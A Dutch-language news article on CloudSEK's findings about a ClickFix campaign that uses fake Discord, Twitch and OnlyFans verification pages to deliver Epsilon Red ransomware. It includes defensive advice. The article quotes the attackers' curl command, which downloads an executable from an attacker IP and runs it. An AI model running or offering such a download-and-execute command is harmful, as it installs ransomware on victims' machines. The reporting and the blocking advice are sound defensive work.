OnlyFans en Discord ClickFix-themapagina's verspreiden Epsilon Red-ransomware

Een geavanceerde nieuwe ransomware-campagne misleidt internetgebruikers over de hele wereld door nep-verificatiepagina's te gebruiken om een gevaarlijke bedreiging genaamd Epsilon Red-malware te verspreiden.

Deze cruciale bevinding wordt onthuld in het nieuwste rapport over dreigingsinformatie van CloudSEK, een toonaangevend cybersecuritybedrijf. De lopende campagne, die voor het eerst werd opgemerkt in juli 2025, maakt gebruik van social engineering, waarbij aanvallers zich voordoen als populaire onlinediensten zoals Discord , Twitch en OnlyFans . Ze misleiden gebruikers om schadelijke .HTA -bestanden te downloaden, speciale HTML-applicaties die scripts rechtstreeks op een computer kunnen uitvoeren.

Volgens CloudSec worden er op de achtergrond schadelijke opdrachten uitgevoerd als slachtoffers op een van de valse ClickFix-verificatiepagina's terechtkomen en ermee interacteren, zonder dat ze het weten.

Dit gebeurt via ActiveX -misbruik, een technologie die interactieve content in webbrowsers mogelijk maakt. Bij deze aanval downloadt en voert het schadelijke script de Epsilon Red- ransomware stilletjes uit vanaf een verborgen locatie, waarbij de normale beveiligingscontroles worden omzeild.

Uit de analyse van CloudSEK die met Hackread.com is gedeeld, kwamen de opdrachten curl -s -o a.exe http://155.94.155227:2269/dw/vir.exe && a.exe naar voren, die de ransomware downloaden en uitvoeren zonder dat de gebruiker een normaal downloadvenster ziet.

Vervolgens wordt een vals verificatiebericht weergegeven, waardoor de gebruiker ten onrechte denkt dat alles in orde is. Opvallend is dat er een kleine typefout in het nepbericht staat, "Verificatification", wat mogelijk een opzettelijke fout is om minder verdacht over te komen.

Het TRIAD-team van CloudSEK, dat verantwoordelijk is voor deze ontdekking, merkte op dat deze nieuwe variant, in tegenstelling tot oudere versies van soortgelijke aanvallen, waarbij schadelijke opdrachten eenvoudigweg naar een klembord werden gekopieerd, slachtoffers naar een tweede pagina stuurt waar de infectie plaatsvindt zonder duidelijke waarschuwing.

De infrastructuur die deze campagne ondersteunt, omvat verschillende nepdomeinen en IP-adressen die eruitzien als legitieme diensten, waaronder een neppe Discord Captcha Bot. Ze vonden ook een aantal dating- of romance-lokpagina's. Daarnaast werd een andere malware, een Quasar RAT , aan deze campagne gekoppeld, wat wijst op potentieel voor controle op afstand naast ransomware.

Epsilon Red-ransomware, voor het eerst gezien in 2021, laat losgeldbrieven achter die enigszins lijken op die van de bekende REvil-ransomware , hoewel de twee verder verschillen in hun werkwijze. Dit onderstreept een trend waarbij verschillende ransomwaregroepen elementen van elkaar overnemen.

Om zich tegen deze nieuwe bedreiging te beschermen, raadt CloudSEK verschillende belangrijke stappen aan. Gebruikers moeten ActiveX en Windows Script Host (WSH) uitschakelen via de instellingen van hun computer om dit soort scriptuitvoeringen te blokkeren. Organisaties moeten ook feeds met bedreigingsinformatie gebruiken om IP-adressen en domeinen van bekende aanvallers, zoals twtichcc en 155.94.155227:2269 , direct te blokkeren.

Bovendien moeten endpoint security tools zo worden ingesteld dat ze ongewone, verborgen activiteiten detecteren, zoals programma's die stilletjes vanuit webbrowsers draaien. Ten slotte is continue training in beveiligingsbewustzijn cruciaal. Zo leren gebruikers nepverificatiepagina's en social engineering- pogingen te herkennen en te vermijden, zelfs als ze zich voordoen als bekende online platforms.